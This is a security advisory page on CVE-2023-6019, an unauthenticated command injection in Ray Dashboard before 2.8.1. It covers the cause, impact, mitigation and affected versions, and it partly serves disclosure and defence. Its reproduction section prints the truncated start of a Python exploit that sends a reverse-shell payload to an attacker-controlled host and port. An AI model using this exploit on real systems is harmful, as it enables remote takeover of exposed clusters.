VYPR
← All advisories
Critical severityNVD Advisory· Published Nov 16, 2023· Updated Aug 2, 2024

Ray Command Injection in cpu_profile Parameter

CVE-2023-6019

Description

Unauthenticated remote command injection in Ray Dashboard's cpu_profile parameter before 2.8.1.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Unauthenticated remote command injection in Ray Dashboard's cpu_profile parameter before 2.8.1.

Root

Cause CVE-2023-6019 is a command injection vulnerability in the Ray Dashboard's cpu_profile URL parameter. The parameter is not properly sanitized, allowing an attacker to inject arbitrary OS commands. This issue affects Ray versions prior to 2.8.1 [1].

Exploitation

An attacker can exploit this vulnerability by sending a crafted HTTP request to the Ray Dashboard without any authentication. No special privileges or network position beyond access to the dashboard are required. The dashboard is intended to be accessible only within a trusted network, but exposure to the internet or untrusted networks enables remote exploitation [3].

Impact

Successful exploitation allows the attacker to execute arbitrary commands on the underlying operating system with the privileges of the Ray Dashboard process. This can lead to full compromise of the Ray cluster, data exfiltration, or further lateral movement within the network [1][3].

Mitigation

The vulnerability is fixed in Ray version 2.8.1 [2]. Users should upgrade immediately. For deployments where upgrading is not possible, ensure that the Ray Dashboard is not exposed to untrusted networks, as Ray's security model relies on network-level access control [3].

References
  1. NVD - CVE-2023-6019
  2. Release Ray-2.8.1 · ray-project/ray
  3. Update on Ray CVEs CVE-2023-6019, CVE-2023-6020, CVE-2023-6021, CVE-2023-48022, CVE-2023-48023

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
rayPyPI
< 2.8.12.8.1

Affected products

2
  • ghsa-coords
    pkg:pypi/ray
    Range: < 2.8.1
  • ray-project/ray-project/rayv5
    Range: unspecified

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The 'format' parameter in the CPU profiling endpoint is not validated, allowing for OS command injection."

Attack vector

An unauthenticated attacker can send a crafted HTTP GET request to the Ray dashboard's `/worker/cpu_profile` endpoint. By injecting shell metacharacters and a base64 encoded payload into the `format` parameter, the attacker can execute arbitrary commands on the server. The exploit targets the `format` parameter, which is directly incorporated into a system command without proper sanitization [ref_id=1].

Affected code

The vulnerability resides in the CPU profiling functionality of the Ray dashboard, specifically how the `format` parameter is handled. The `format` parameter is directly inserted into a system command executed in a shell, leading to command injection [ref_id=1].

What the fix does

The advisory indicates that the vulnerability is fixed in version 2.8.1 and later. While a specific patch diff is not provided, the fix likely involves input validation on the `format` parameter to prevent the injection of shell metacharacters and ensure that only expected formats are processed. This prevents the construction of malicious OS commands [ref_id=1].

Preconditions

  • networkThe Ray dashboard must be accessible over the network.
  • authNo authentication is required to access the vulnerable endpoint.
  • configIf the system is configured to allow passwordless sudo, the attacker can obtain a root shell; otherwise, a user-level shell is returned [ref_id=1].

Reproduction

```python # !usr/bin/python3 # coding=utf-8 import base64 import argparse import requests import urllib3

def exp(target,ip,lhost, lport): payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\' + lhost + '\',' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\

Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.